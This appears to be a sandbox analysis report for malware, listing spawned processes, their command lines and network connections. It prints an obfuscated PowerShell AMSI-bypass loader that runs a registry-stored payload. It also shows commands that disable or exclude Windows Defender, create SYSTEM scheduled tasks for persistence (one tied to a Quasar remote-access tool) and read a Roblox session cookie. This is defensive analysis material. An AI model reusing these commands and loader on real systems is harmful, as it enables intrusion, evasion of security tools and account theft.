u'+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+'s'+'s'+'',[MulticastDelegate]);$fVXKhXXHDLa.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'ecia'+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+'i'+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+'P'+'u'+''+[Char](98)+'l'+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$umeyVVLDGToceF).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+'i'+'m'+''+'e'+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$fVXKhXXHDLa.DefineMethod(''+'I'+'n'+'v'+''+[Char](111)+''+'k'+'e',''+[Char](80)+'u'+[Char](98)+'l'+'i'+''+'c'+''+[Char](44)+'H'+[Char](105)+'de'+[Char](66)+''+[Char](121)+''+'S'+'ig,'+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+'l'+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$ZrAdVhcZsG,$umeyVVLDGToceF).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+'i'+[Char](109)+'e,'+'M'+'a'+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $fVXKhXXHDLa.CreateType();}$bXtmKZSCpTVYx=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'tem.'+'d'+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+''+[Char](110)+'32'+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+'a'+'f'+'e'+''+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+'e'+[Char](116)+''+[Char](104)+'od'+[Char](115)+'');$wFvYxvohMAUEzS=$bXtmKZSCpTVYx.GetMethod(''+'G'+''+'e'+''+'t'+'P'+[Char](114)+''+[Char](111)+'c'+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+'ss',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+'St'+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$kcdKkUtmtPkDSiHcEjk=JKDOUiagHrSJ @([String])([IntPtr]);$EdgixwyRFbiznMIWkxEVmz=JKDOUiagHrSJ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$WjgfhfLEWhZ=$bXtmKZSCpTVYx.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+'l'+'e'+[Char](72)+''+'a'+''+'n'+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$oFyepkmkifGwOa=$wFvYxvohMAUEzS.Invoke($Null,@([Object]$WjgfhfLEWhZ,[Object](''+'L'+'o'+[Char](97)+''+'d'+'L'+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+'yA')));$qKBxhpyTCNRWlxRjW=$wFvYxvohMAUEzS.Invoke($Null,@([Object]$WjgfhfLEWhZ,[Object](''+'V'+'i'+[Char](114)+''+[Char](116)+'ua'+'l'+''+[Char](80)+'ro'+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$CBYkFaL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oFyepkmkifGwOa,$kcdKkUtmtPkDSiHcEjk).Invoke('a'+'m'+''+[Char](115)+''+[Char](105)+''+[Char](46)+'d'+[Char](108)+''+'l'+'');$hGgbzRwWIwmVzgVZl=$wFvYxvohMAUEzS.Invoke($Null,@([Object]$CBYkFaL,[Object](''+'A'+''+[Char](109)+'s'+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+'B'+[Char](117)+''+'f'+''+[Char](102)+'e'+'r'+'')));$MQjGkNOzLa=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qKBxhpyTCNRWlxRjW,$EdgixwyRFbiznMIWkxEVmz).Invoke($hGgbzRwWIwmVzgVZl,[uint32]8,4,[ref]$MQjGkNOzLa);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hGgbzRwWIwmVzgVZl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qKBxhpyTCNRWlxRjW,$EdgixwyRFbiznMIWkxEVmz).Invoke($hGgbzRwWIwmVzgVZl,[uint32]8,0x20,[ref]$MQjGkNOzLa);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](114)+''+[Char](117)+''+[Char](116)+''+'s'+''+[Char](115)+''+'t'+'a'+'g'+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{2f556b46-b4fa-40a1-9d8d-75055e262b48}
C:\Windows\system32\lsass.exe
"C:\Windows\system32\lsass.exe"
C:\Users\Admin\AppData\Local\Temp\aysnfp.exe
"C:\Users\Admin\AppData\Local\Temp\aysnfp.exe"
C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im conhost.exe
C:\Windows\system32\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "6008" "2444" "2336" "2448" "0" "0" "2452" "0" "0" "0" "0" "0"
C:\Users\Admin\AppData\Local\Temp\a\info.exe
"C:\Users\Admin\AppData\Local\Temp\a\info.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C regedit /s "%SystemDrive%\Windows\SysWOW64\ruts\11.reg
C:\Windows\SysWOW64\regedit.exe
regedit /s "C:\Windows\SysWOW64\ruts\11.reg
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "%SystemDrive%\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
C:\Users\Admin\AppData\Local\Temp\a\50.exe
"C:\Users\Admin\AppData\Local\Temp\a\50.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "C:\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:IatsIrXKqRUi{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$tBgnKfIAsRoNDB,[Parameter(Position=1)][Type]$BMKFNGQnYY)$yyKwRIgiJdI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+'g'+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+'o'+'ry'+[Char](77)+'o'+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+'e'+''+'l'+'eg'+[Char](97)+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+'e',''+'C'+'la'+'s'+'s,'+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'l'+'e'+''+[Char](100)+','+[Char](65)+''+[Char](110)+''+[Char](115)+''+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+'A'+'u'+[Char](116)+''+[Char](111)+''+'C'+'l'+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$yyKwRIgiJdI.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+'c'+'i'+[Char](97)+''+[Char](108)+''+'N'+''+'a'+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$tBgnKfIAsRoNDB).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+'ag'+'e'+''+[Char](100)+'');$yyKwRIgiJdI.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+'ke','P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+'Hid'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+','+[Char](78)+''+'e'+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+'i'+[Char](114)+'t'+'u'+''+[Char](97)+''+[Char](108)+'',$BMKFNGQnYY,$tBgnKfIAsRoNDB).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'me'+','+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+'g'+'e'+''+'d'+'');Write-Output $yyKwRIgiJdI.CreateType();}$kNeUHdWwRUBMt=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+''+'m'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.W'+'i'+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+'U'+[Char](110)+'s'+'a'+''+'f'+''+[Char](101)+'N'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+'d'+[Char](115)+'');$pqiKfkcfZnbZUs=$kNeUHdWwRUBMt.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+'P'+''+[Char](114)+''+[Char](111)+'c'+[Char](65)+''+'d'+''+[Char](100)+'r'+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+'t'+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$dPmhKfslVrSewqGQWEL=IatsIrXKqRUi @([String])([IntPtr]);$CxAkEzjAKKRynRZcRnroip=IatsIrXKqRUi @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XGffGHvokiP=$kNeUHdWwRUBMt.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'M'+'od'+[Char](117)+''+'l'+''+[Char](101)+''+[Char](72)+''+[Char](97)+'n'+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+'n'+''+[Char](101)+''+[Char](108)+'32.'+[Char](100)+'l'+[Char](108)+'')));$jlMcWRhAYaEWJr=$pqiKfkcfZnbZUs.Invoke($Null,@([Object]$XGffGHvokiP,[Object](''+'L'+''+'o'+''+[Char](97)+'d'+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+'y'+[Char](65)+'')));$ubfsRlzJTLxedNVJi=$pqiKfkcfZnbZUs.Invoke($Null,@([Object]$XGffGHvokiP,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+'l'+''+[Char](80)+''+[Char](114)+''+'o'+'t'+[Char](101)+'ct')));$PCuKzbd=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jlMcWRhAYaEWJr,$dPmhKfslVrSewqGQWEL).Invoke(''+'a'+''+'m'+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+'l'+'l'+'');$KpfnIWStGwKffFFYy=$pqiKfkcfZnbZUs.Invoke($Null,@([Object]$PCuKzbd,[Object]('A'+[Char](109)+'s'+[Char](105)+'S'+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+'uf'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$lFdXhORsVY=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ubfsRlzJTLxedNVJi,$CxAkEzjAKKRynRZcRnroip).Invoke($KpfnIWStGwKffFFYy,[uint32]8,4,[ref]$lFdXhORsVY);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$KpfnIWStGwKffFFYy,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ubfsRlzJTLxedNVJi,$CxAkEzjAKKRynRZcRnroip).Invoke($KpfnIWStGwKffFFYy,[uint32]8,0x20,[ref]$lFdXhORsVY);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+'RE').GetValue(''+[Char](114)+''+[Char](117)+''+'t'+''+[Char](115)+'s'+'t'+''+[Char](97)+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c delete.bat
C:\Users\Admin\AppData\Local\Temp\a\SH.exe
"C:\Users\Admin\AppData\Local\Temp\a\SH.exe"
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe
"C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe
"C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"
C:\Users\Admin\AppData\Local\Temp\a\qwex.exe
"C:\Users\Admin\AppData\Local\Temp\a\qwex.exe"
C:\Users\Admin\AppData\Local\Temp\a\XW.exe
"C:\Users\Admin\AppData\Local\Temp\a\XW.exe"
C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe
"C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe"
C:\Users\Admin\AppData\Local\Temp\a\boleto.exe
"C:\Users\Admin\AppData\Local\Temp\a\boleto.exe"
C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe
"C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe"
C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe
"C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe"
C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe
"C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe"
C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe
"C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe"
C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe
"C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe"
C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe
"C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe"
C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe
"C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe"
C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe
"C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe
"C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe'
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe
"C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\boleto.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "xda" /tr "C:\Users\Admin\AppData\Roaming\System32\xda.dll"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XW.exe'
C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe
"C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe"
C:\Windows\SysWOW64\msiexec.exe
msiexec /i vcredist.msi
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XW.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\MicrosoftProfile.exe'
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 7332 -ip 7332
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7332 -s 1200
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftProfile.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Users\Admin\AppData\Local\Temp\a\jy.exe
"C:\Users\Admin\AppData\Local\Temp\a\jy.exe"
C:\Users\Admin\AppData\Local\Temp\is-K48KG.tmp\jy.tmp
"C:\Users\Admin\AppData\Local\Temp\is-K48KG.tmp\jy.tmp" /SL5="$801FC,1888137,52736,C:\Users\Admin\AppData\Local\Temp\a\jy.exe"
C:\Users\Admin\AppData\Local\Temp\a\test30.exe
"C:\Users\Admin\AppData\Local\Temp\a\test30.exe"
C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe
"C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftProfile" /tr "C:\Users\Admin\MicrosoftProfile.exe"
C:\Users\Admin\AppData\Local\Temp\a\Discord.exe
"C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"
C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe
"C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\a\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\a\Loader.exe"
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8rMGYVCuBZ7G.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WUviXiYV9Nab.bat" "
C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe
"C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2348 -ip 2348
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2348 -s 1304
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.66.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.66.101.151.in-addr.arpa | udp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gateway.discord.gg | udp |
| US | 162.159.136.234:443 | gateway.discord.gg | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 8.8.8.8:53 | 209.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.136.159.162.in-addr.arpa | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | geolocation-db.com | udp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.102.89.159.in-addr.arpa | udp |
| FR | 194.59.30.220:1336 | tcp | |
| US | 8.8.8.8:53 | 220.30.59.194.in-addr.arpa | udp |
| RU | 31.41.244.10:80 | 31.41.244.10 | tcp |
| US | 8.8.8.8:53 | 10.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| RU | 31.41.244.12:80 | 31.41.244.12 | tcp |
| US | 8.8.8.8:53 | 12.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| FR | 142.250.179.67:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| FR | 142.250.179.67:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | 238.75.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 225.74.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| RU | 31.41.244.9:80 | 31.41.244.9 | tcp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 88.221.134.91:80 | r11.o.lencr.org | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | 168.245.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | 41.249.124.192.in-addr.arpa | udp |
